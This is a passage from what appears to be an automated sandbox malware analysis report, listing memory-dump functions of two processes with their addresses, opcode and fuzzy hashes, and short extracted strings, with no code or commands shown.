                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3d1bef8108f43a9daf931a45ff85eb03bfedf3a52cbc3caae84541a8a3388c18
                                                                                                                            • Instruction ID: d898e35c18d78ded7796fa3e8fd42982014040f9375067d4454367d25e9a7e84
                                                                                                                            • Opcode Fuzzy Hash: 3d1bef8108f43a9daf931a45ff85eb03bfedf3a52cbc3caae84541a8a3388c18
                                                                                                                            • Instruction Fuzzy Hash: 75F0C231648A098FCB54DF04C494FA973B1FB98311F1586A9D00ED7260DA74AA85DF81
                                                                                                                            Function 00007FFD9B7568B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction ID: 3f7952d22c7bf6876b4bdfb0b05cb588e175a4afaf13eb274847710e2ecbde61
                                                                                                                            • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction Fuzzy Hash: 97F09630A0950E4AEAB4E6C4D4656F833A1EF14300F1102B9D84EE31B2DE98BE974641
                                                                                                                            Function 00007FFD9B751DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction ID: 4eaf232e06f4fc78891fe36b25e7d65f0a7da15d4abc5d584ad1dfd486b932c8
                                                                                                                            • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction Fuzzy Hash: 88E01A74F0D61E87FB68A2C4C8617E97265EB88300F150678DA1E933E5CEA8AE428655
                                                                                                                            Function 00007FFD9B750D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: d13d39a6bcb6e22f33fd5431c04bc28ba79635e90f3539f56ae3d56a3e3403f4
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: CFE01234B0930ECBE710DBD4C4946ED7761EB52711F104765C401872E9DAB86785C680
                                                                                                                            Function 00007FFD9B750B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction ID: 9502cd7157f9a6dd517516dc7156090dfe9f7b4df253c1560e670d996e08d49e
                                                                                                                            • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction Fuzzy Hash: 6FC01230A2990E8FDA40BB68C888824BBA0FB0E301BDA14E0E00CCB1B1D65999918702
                                                                                                                            Function 00007FFD9B7506A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction ID: 2101a0719d5417676fe5e34ea31e1922c74b5c084328e5bca60723abff912118
                                                                                                                            • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction Fuzzy Hash: 71C01200F0B60E01F42031EA14220ADB100ABC6A10FD20232D409400B1988E22C70146
                                                                                                                            Function 00007FFD9B7512B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction ID: b3f25133d7dbf37801448c223bbc0a70880a77241fb955089cd69d212092285f
                                                                                                                            • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction Fuzzy Hash: 47C08C3051180C8FC908EB68C88490833A0FB0A200BC200A0E008C7170D259DCC1C780
                                                                                                                            Function 00007FFD9B754960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0262f9f288c9849b81a8ec484f929ccf1b27435b7283a419c64084758d137d4a
                                                                                                                            • Instruction ID: 9e08d891658848b870f421d6ddee1cd82b59e767702c44ad920c03de7abadeb6
                                                                                                                            • Opcode Fuzzy Hash: 0262f9f288c9849b81a8ec484f929ccf1b27435b7283a419c64084758d137d4a
                                                                                                                            • Instruction Fuzzy Hash: DDC08C00F1CD1A06FB596244043023E04029B40208F8103B4E41E833EECD0C1E0242CB
                                                                                                                            Function 00007FFD9B7506C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction ID: 8f9185061cb3440436efa8ea7502423cb379e2ecafa5aa7879491a870f6ac1ad
                                                                                                                            • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction Fuzzy Hash: 96B01200D5750F00F42431FA08520B574405F45100FC20270E40C401B598CD12D60242

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7509B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.1841901607.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b750000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 84ea54b73b2a3df4a11884d73ae920d86cd5ab6511dbcd9a3a31070a27598f75
                                                                                                                            • Instruction ID: cb03682bb035a395e4f1fc682717c985b8403579a4f4b68372144d61c1dfc828
                                                                                                                            • Opcode Fuzzy Hash: 84ea54b73b2a3df4a11884d73ae920d86cd5ab6511dbcd9a3a31070a27598f75
                                                                                                                            • Instruction Fuzzy Hash: EB41C41BB8D1675DE31932FD7561CFD2B4A8FA5334B0847B7F05E890D78E08608686E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B790D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.4196015033.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b790000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5X_H
                                                                                                                            • API String ID: 0-3241812158
                                                                                                                            • Opcode ID: 99fe638168c26d7c8ec40f8d08f0f979868c73d5c4daaad65566a38084c6e8aa
                                                                                                                            • Instruction ID: 1cb84b47d367cff70730f17304bf87b5227741b193a145f7cd4191e3d046ea54
                                                                                                                            • Opcode Fuzzy Hash: 99fe638168c26d7c8ec40f8d08f0f979868c73d5c4daaad65566a38084c6e8aa
                                                                                                                            • Instruction Fuzzy Hash: 2891E5B5A29A8D8FE759DFA888697A87FE1FF55314F0001BED009D72E6DBB81410C741
                                                                                                                            Function 00007FFD9B79116D Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.4196015033.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b790000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 0-2852464175
                                                                                                                            • Opcode ID: 008cc6d499656461b53406fcb67886b3e02e3b691934042f3c305d827f33f860
                                                                                                                            • Instruction ID: 79eb2b924ae6ea9112e3e992d7fd46bcc31ab995de4ade5fded9a469a1642dbc
                                                                                                                            • Opcode Fuzzy Hash: 008cc6d499656461b53406fcb67886b3e02e3b691934042f3c305d827f33f860
                                                                                                                            • Instruction Fuzzy Hash: 2D318231A0964E9FDB45EB68C864EB977F1FF69300F0506BAD009D72B2DA38A945CB50
                                                                                                                            Function 00007FFD9B790C0D Relevance: .1, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.4196015033.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b790000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9f558eb6527290e0f407088a2b39c8f7e599f3dbebdaa7cf17062b54ebf05395
                                                                                                                            • Instruction ID: dc9af7c8493d0c8c1238dc9e91a0efad5f170c9a92414def9148eebc09576906
                                                                                                                            • Opcode Fuzzy Hash: 9f558eb6527290e0f407088a2b39c8f7e599f3dbebdaa7cf17062b54ebf05395
                                                                                                                            • Instruction Fuzzy Hash: 67212936B1D78E5FE712A7B868510EC3B60EF52320F1542B7D0588A1F7DE3466468781

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B790960 Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.4196015033.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b790000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: f417c5854346cd1edc1d14ebd08ac1bfc54cfed80a57f5cd73931b747e124500
                                                                                                                            • Instruction ID: b111c4ed919b9ab30551114c624551df179196dec37e4f15df6e320d6d6220e4
                                                                                                                            • Opcode Fuzzy Hash: f417c5854346cd1edc1d14ebd08ac1bfc54cfed80a57f5cd73931b747e124500
                                                                                                                            • Instruction Fuzzy Hash: 3C51C10BB8C5271DE31A36FC75228FD6B46DF61375B0847B7F02E890EB4E1960858AD5